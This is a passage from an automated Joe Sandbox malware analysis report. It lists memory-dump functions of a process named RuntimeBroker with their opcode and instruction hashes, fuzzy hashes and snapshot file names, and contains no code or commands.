                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b43e316ad20e16314541392b6f6bee782d79f4d02cd2e47a65919f8bf742c1c6
                                                                                                                            • Instruction ID: b6ed49096b5488eb39ce76ffd12d9f8f7ee390b1a9883332e63e9d4e0e132804
                                                                                                                            • Opcode Fuzzy Hash: b43e316ad20e16314541392b6f6bee782d79f4d02cd2e47a65919f8bf742c1c6
                                                                                                                            • Instruction Fuzzy Hash: 7E210831A1991D8FDF99DB58C4A5AADB7B1FF68304F1141BED00EE36E1CA35AA41CB40
                                                                                                                            Function 00007FFD9BB8713E Relevance: .1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 847fc81f1326fca554e5bae41e80902f5413f513c318a5846b6ba0d9b9afd1b7
                                                                                                                            • Instruction ID: ec1d457a6d4c83f0c082dd406ccfb7462dd5b002c080052804946e3833a3ba5e
                                                                                                                            • Opcode Fuzzy Hash: 847fc81f1326fca554e5bae41e80902f5413f513c318a5846b6ba0d9b9afd1b7
                                                                                                                            • Instruction Fuzzy Hash: 8C210B13A0F6C60FD757DAB908750B47F91AF23228B0900FBC0988F5F7D6249A09C752
                                                                                                                            Function 00007FFD9BB72EE8 Relevance: .1, Instructions: 76COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0f5e234aeae58d8efdf403cb2343b46a375ab0c8a730df1d8e4dac7b788d1f8a
                                                                                                                            • Instruction ID: de973d8d8d0b1985637c8711303a55f803b3e6e72edbff4aef9c7d4423f589e6
                                                                                                                            • Opcode Fuzzy Hash: 0f5e234aeae58d8efdf403cb2343b46a375ab0c8a730df1d8e4dac7b788d1f8a
                                                                                                                            • Instruction Fuzzy Hash: B9214C75E1A94D8FDB98DB98C8A09EDB7B1FF59304F110179D00EE72E1DE246901C780
                                                                                                                            Function 00007FFD9BB749D9 Relevance: .1, Instructions: 74COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a8317976fd657ac51049759d3e44f22bfd4e9e507fbe4d1e6ed8cad06856c9cd
                                                                                                                            • Instruction ID: 6cb2616cff2782385c97d0b75684d73cbc91e2cc614646e6654e7616926a6e33
                                                                                                                            • Opcode Fuzzy Hash: a8317976fd657ac51049759d3e44f22bfd4e9e507fbe4d1e6ed8cad06856c9cd
                                                                                                                            • Instruction Fuzzy Hash: D7110622E0E78D5FE76185A488A51AD3AA1FF46341B06017AE04DD71E2DD982E068365
                                                                                                                            Function 00007FFD9BC920F0 Relevance: .1, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4205323259.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bc90000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f8c4e47cc1ba3562d2a4be138045cfd0bcb13a7cf7e56e0bdf783a640ee15968
                                                                                                                            • Instruction ID: 37e1af86721b671481cfc7795329c081ea91eaf5b890cca52abc1f6e732bad52
                                                                                                                            • Opcode Fuzzy Hash: f8c4e47cc1ba3562d2a4be138045cfd0bcb13a7cf7e56e0bdf783a640ee15968
                                                                                                                            • Instruction Fuzzy Hash: D5112BA554F3C55FD32787785C254A4BFB0AF5321171B41EBC0C9CE8B3D649495AC362
                                                                                                                            Function 00007FFD9BB76660 Relevance: .1, Instructions: 68COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aa3c83201f0d67bd578769e141b46df4b96ebbea1308a20e508af539484b44e3
                                                                                                                            • Instruction ID: ecb360ed4296e57870f1d74477ddef0ffdd859d5c1b98a054032c9d55c92c99f
                                                                                                                            • Opcode Fuzzy Hash: aa3c83201f0d67bd578769e141b46df4b96ebbea1308a20e508af539484b44e3
                                                                                                                            • Instruction Fuzzy Hash: E411A810A1E46F4AE63CCA5884B49B47351FF91305B2A45BAD45FCB8EEC82CFA819780
                                                                                                                            Function 00007FFD9BB71610 Relevance: .1, Instructions: 68COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c0c5c544ae7b785a7c98aa5b6f95784ba134502fa7428834d8dd2395df997b1e
                                                                                                                            • Instruction ID: 212ac7bc09ee73e97c70f8293c05695bdd64fe6e129d8db73abb6aa84dd93907
                                                                                                                            • Opcode Fuzzy Hash: c0c5c544ae7b785a7c98aa5b6f95784ba134502fa7428834d8dd2395df997b1e
                                                                                                                            • Instruction Fuzzy Hash: 2E11BB10B2D46F87F638CA4894F49B47791FF50305B1D4A75D49F879EAC828FA819790
                                                                                                                            Function 00007FFD9BB756E0 Relevance: .1, Instructions: 65COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aeaa8fc0f54dd1a739d4b71975588e028e69efd22412ac57513de20449db4c72
                                                                                                                            • Instruction ID: dea59b428acb07eeb237d10ae820338609a738a614ebe586f124f222cdd23eb8
                                                                                                                            • Opcode Fuzzy Hash: aeaa8fc0f54dd1a739d4b71975588e028e69efd22412ac57513de20449db4c72
                                                                                                                            • Instruction Fuzzy Hash: 83110630B19A0D8EDBA9EB6494625FA73E0FF44355B40477AD44FC75F2CE29B60583A0
                                                                                                                            Function 00007FFD9BB70690 Relevance: .1, Instructions: 65COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: be4569b6e56c7faf0b89bbd744d41de40f3bad2321ce409669c151713066c9e4
                                                                                                                            • Instruction ID: 17f5db21f07adfaff2ff90e7373ac992686d76c7d3888e22651f30eb4905833e
                                                                                                                            • Opcode Fuzzy Hash: be4569b6e56c7faf0b89bbd744d41de40f3bad2321ce409669c151713066c9e4
                                                                                                                            • Instruction Fuzzy Hash: 6611E730B19A0D4EDBA4EBA494715FA77A1FF44344B404677D44EC75F2CE29BA058790
                                                                                                                            Function 00007FFD9BB7555E Relevance: .1, Instructions: 61COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dca865a82b1fc271f894af0c83e84d78c6b038972e8fa893a7681f30a82bcb28
                                                                                                                            • Instruction ID: 7ca05f9fb4089431f4d60b181fc11f8ce8c53f774eed6bf27dbdb0360e0a04d2
                                                                                                                            • Opcode Fuzzy Hash: dca865a82b1fc271f894af0c83e84d78c6b038972e8fa893a7681f30a82bcb28
                                                                                                                            • Instruction Fuzzy Hash: 9B118E3130A60E8FE769AA54D4A17E933D0FF44395F01423BD81EC75E1CF6AA640C7A0
                                                                                                                            Function 00007FFD9BB7050E Relevance: .1, Instructions: 61COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bb8756505d20dab2ebdbd50fee8652696430d2d272dfa0260834bba100168b4b
                                                                                                                            • Instruction ID: a3d018697c7221c8a274cdf1d2910b296347c051d9379d5762cb99782e7aebcf
                                                                                                                            • Opcode Fuzzy Hash: bb8756505d20dab2ebdbd50fee8652696430d2d272dfa0260834bba100168b4b
                                                                                                                            • Instruction Fuzzy Hash: 17116B3130660A8FEB68DA54D4B12E53390FF84355F41427BD81EC75E1CF6AEA40C7A0
                                                                                                                            Function 00007FFD9BB73A70 Relevance: .1, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3a5a938fc7c1995af435bb390828fb104ed9c569145bb39cb03fcbe1cffd1802
                                                                                                                            • Instruction ID: 90cef4c604ee9970b46775c77ee8f0dc50b317bfedeab7d385e0092398237fec
                                                                                                                            • Opcode Fuzzy Hash: 3a5a938fc7c1995af435bb390828fb104ed9c569145bb39cb03fcbe1cffd1802
                                                                                                                            • Instruction Fuzzy Hash: D111F930A1990D9FDB9CDB58C4A6AADB7B1FF58304F4101BE900ED36E1CE256A418B00
                                                                                                                            Function 00007FFD9B780C38 Relevance: .1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a4cfa892c5a492d51923783b0726b3fe330f3dbd5160eaa07a34562cfae1d8e0
                                                                                                                            • Instruction ID: e44e193ff35027c2c06144fc2c09d4cc0b86253dbb0fd23893ead4ac4ac4c8f9
                                                                                                                            • Opcode Fuzzy Hash: a4cfa892c5a492d51923783b0726b3fe330f3dbd5160eaa07a34562cfae1d8e0
                                                                                                                            • Instruction Fuzzy Hash: 1C115135B0EB8D8EE7229B6888A51EC7BB0EF52611F1646F7C044DB1F2D93856458781
                                                                                                                            Function 00007FFD9B780C48 Relevance: .0, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0b305d0a6ebc9be9015c777e383aa56e95e0d3a4b67bfa218313d7a1ff2656cd
                                                                                                                            • Instruction ID: 222003890256e98a818809fa2332d7618af9837bd783cd62b748e54aea0f7181
                                                                                                                            • Opcode Fuzzy Hash: 0b305d0a6ebc9be9015c777e383aa56e95e0d3a4b67bfa218313d7a1ff2656cd
                                                                                                                            • Instruction Fuzzy Hash: CE018035A0E78D8FD722DB6488A009C7FB0AF42701F1642E7C044DB1F2DA385A458B81
                                                                                                                            Function 00007FFD9BB7AD90 Relevance: .0, Instructions: 40COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cdd70211fdddcb07a08c4dc42829eb4f880823d7f74878485b267e9f92c711f1
                                                                                                                            • Instruction ID: 8cb71edf67242d6256e9cc15c0237456a4d389906b7b8a3dfddcb0d21cbd9c59
                                                                                                                            • Opcode Fuzzy Hash: cdd70211fdddcb07a08c4dc42829eb4f880823d7f74878485b267e9f92c711f1
                                                                                                                            • Instruction Fuzzy Hash: 5801D471B0E54E8FE7E89B58C8F4BA83692FF84315F1706B5D00D835E2DA786A848640
                                                                                                                            Function 00007FFD9BB7D77D Relevance: .0, Instructions: 39COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 145ae081f55aa27359d107befb1105a9138e8fa78acd27c654d6c6c89094b8ec
                                                                                                                            • Instruction ID: 968fbab5cc272a51f97eee483cc1add57000ec09aba052277f36709e55f8875d
                                                                                                                            • Opcode Fuzzy Hash: 145ae081f55aa27359d107befb1105a9138e8fa78acd27c654d6c6c89094b8ec
                                                                                                                            • Instruction Fuzzy Hash: 6CF02731B08F180BC728B66DACB95F577D1DF6521930943B7E05AC62E7DD24EC848684
                                                                                                                            Function 00007FFD9B7AE1D5 Relevance: .0, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B7A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A3000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b7a3000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 651446ac8374eee56ca9b3487766813397ce5f0626d61f83575f055a9fac32b5
                                                                                                                            • Instruction ID: c99eeb996b23b6d4c8bbc5d1634e265d2e899dc22b09ddc6aeea071ed8321ab4
                                                                                                                            • Opcode Fuzzy Hash: 651446ac8374eee56ca9b3487766813397ce5f0626d61f83575f055a9fac32b5
                                                                                                                            • Instruction Fuzzy Hash: 7FF0A753B0EFC90FD7A5C2AC58651607FD1DB99220B4E02EBD488C71A7E84859568391
                                                                                                                            Function 00007FFD9B780C50 Relevance: .0, Instructions: 37COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c015325326d995899916c922b51d2a7264f764c1fca31453468c5eeb95e96a16
                                                                                                                            • Instruction ID: 91ce4f0cd4e616eec99ba9c6f925ac936ad876336b0ccaf528421c76ba9bc08c
                                                                                                                            • Opcode Fuzzy Hash: c015325326d995899916c922b51d2a7264f764c1fca31453468c5eeb95e96a16
                                                                                                                            • Instruction Fuzzy Hash: C9017C34A0E78D9FE722DBA488A40ACBFB0AF02701F1542E7C044DB2E2EA385A448741
                                                                                                                            Function 00007FFD9BB73D42 Relevance: .0, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f6327bf2f4d9c83900c8004263c691b8270a57df7ad50b92ec454b91d5441cd9
                                                                                                                            • Instruction ID: 7c5d9c4846627432666e939b1dcb80e7b984876c89cc5040c84cd9e0a307335b
                                                                                                                            • Opcode Fuzzy Hash: f6327bf2f4d9c83900c8004263c691b8270a57df7ad50b92ec454b91d5441cd9
                                                                                                                            • Instruction Fuzzy Hash: E4F0963544E3C99FD7129BB088618D97FB4FF43204B1601EAD49AD70B2C66D6716C761
                                                                                                                            Function 00007FFD9B785E02 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 420e4002791dd227017f9c95c078b8f83bfa9c5a82e70b9a3bd2b847ad4b8642
                                                                                                                            • Instruction ID: 48f38d1c7378ce6d24cf6b3de3bb34e7628e0433ad1e9a40d7742bedcf5c9a5b
                                                                                                                            • Opcode Fuzzy Hash: 420e4002791dd227017f9c95c078b8f83bfa9c5a82e70b9a3bd2b847ad4b8642
                                                                                                                            • Instruction Fuzzy Hash: E5F0C231648A098FCB54DF04C894FA973B1FB98311F1586A9D00ED7260DA34AA85DF81
                                                                                                                            Function 00007FFD9BB75538 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bf6e3dec84f2f0f20d8c6d2ab1081eecc93095727384b4dd39052e146f35df94
                                                                                                                            • Instruction ID: facecdafcb68cc7ee7f4dceee39c6cfa8072c953e59a7cf759a54bf61d1dd921
                                                                                                                            • Opcode Fuzzy Hash: bf6e3dec84f2f0f20d8c6d2ab1081eecc93095727384b4dd39052e146f35df94
                                                                                                                            • Instruction Fuzzy Hash: 6BF05E21B0F50ECAF776159095B22BD2652FF01359F62457AC41F878E1CD1A770582A1
                                                                                                                            Function 00007FFD9B794B7A Relevance: .0, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b790000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f747cd76a50f8eaafc175bb5992f446a053f3789100cc4f1f6c70f3d0c472a88
                                                                                                                            • Instruction ID: cda50879fb8862cd7d1510b4e04e82c8eb313e3a71417add882fcbbc09dd2eef
                                                                                                                            • Opcode Fuzzy Hash: f747cd76a50f8eaafc175bb5992f446a053f3789100cc4f1f6c70f3d0c472a88
                                                                                                                            • Instruction Fuzzy Hash: CBF0E930B0D61F8BFA74AA8894A05F93350EF55311F030378D40AC31BBCE28AA024388
                                                                                                                            Function 00007FFD9BC92169 Relevance: .0, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4205323259.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bc90000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 73165393e786c873e1c64ca465c0da33ff2dd6979206a77014aa615cade432b3
                                                                                                                            • Instruction ID: 25d1016c98932b705d1743c026c37da0af384c115c296621c69da165f153cfbb
                                                                                                                            • Opcode Fuzzy Hash: 73165393e786c873e1c64ca465c0da33ff2dd6979206a77014aa615cade432b3
                                                                                                                            • Instruction Fuzzy Hash: E1F08C2090FB854EE37A57B558740247FF09F2720070A05FBC1C9CA5F6E85969858312
                                                                                                                            Function 00007FFD9BB74A3A Relevance: .0, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 88154a65f60a1cd6525d52a3c6aa698cf6b4d98128bdca5b29f036d3db765b73
                                                                                                                            • Instruction ID: 075483f9c63a545eec038a7fa2fd15d9e010fffc5b61470b26a46b2277c48800
                                                                                                                            • Opcode Fuzzy Hash: 88154a65f60a1cd6525d52a3c6aa698cf6b4d98128bdca5b29f036d3db765b73
                                                                                                                            • Instruction Fuzzy Hash: EEF09621A0E38A4FDB225AB48CE10983B90EF1731471905B9C0498B1E3D5687515D316
                                                                                                                            Function 00007FFD9B7ACB49 Relevance: .0, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B7A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A3000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b7a3000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0cb94114daee86bd7819fdc48c2907002ac5118e70dbc3f97465fd662d929e92
                                                                                                                            • Instruction ID: 7bcc8ea5dbf0d1becee94e0de360de2c983487216b31d96321d812a828fdaf3e
                                                                                                                            • Opcode Fuzzy Hash: 0cb94114daee86bd7819fdc48c2907002ac5118e70dbc3f97465fd662d929e92
                                                                                                                            • Instruction Fuzzy Hash: E3F0396092D7C44FC702AB3888544257FF0EF1710978A02FBD4C9CA5B3DA29884AC752
                                                                                                                            Function 00007FFD9B7A5BF9 Relevance: .0, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B7A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A3000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b7a3000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 54b20cd15459b2fe5866915df9069e703f6302bbf2aff3c18f3c2fd4dd11b9a8
                                                                                                                            • Instruction ID: 7e09828c36062c89072e7c10f63e942edc892cc473a508d91ca5d4453d6798de
                                                                                                                            • Opcode Fuzzy Hash: 54b20cd15459b2fe5866915df9069e703f6302bbf2aff3c18f3c2fd4dd11b9a8
                                                                                                                            • Instruction Fuzzy Hash: E3E09230B5A7854FC70A9A2888695607BB1EF6B10278952FBC446CB1A3DE28DC8AC751
                                                                                                                            Function 00007FFD9B7AE279 Relevance: .0, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B7A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A3000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b7a3000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 475d9310563c7cfac13cb79522932a2f98f63a42d85ead68cc8929cf41236a48
                                                                                                                            • Instruction ID: 32e4b939ab8b742da9449b5387051db13bf9ac60839d788af7f9ca66bb9cd0f8
                                                                                                                            • Opcode Fuzzy Hash: 475d9310563c7cfac13cb79522932a2f98f63a42d85ead68cc8929cf41236a48
                                                                                                                            • Instruction Fuzzy Hash: E5E09230B197C44FCB0A9A2888684607BB1EF6710278952FFC445CB2A3E929DC85C741
                                                                                                                            Function 00007FFD9B781DC0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ff3051ce8f092a69e22551edfefc58e64b516ddd8f195051f1ddaf51897b9e82
                                                                                                                            • Instruction ID: cf7ed3c3850cb40e0cdfd1981f490386eb39531d2b3bce61b01b0f80b3252114
                                                                                                                            • Opcode Fuzzy Hash: ff3051ce8f092a69e22551edfefc58e64b516ddd8f195051f1ddaf51897b9e82
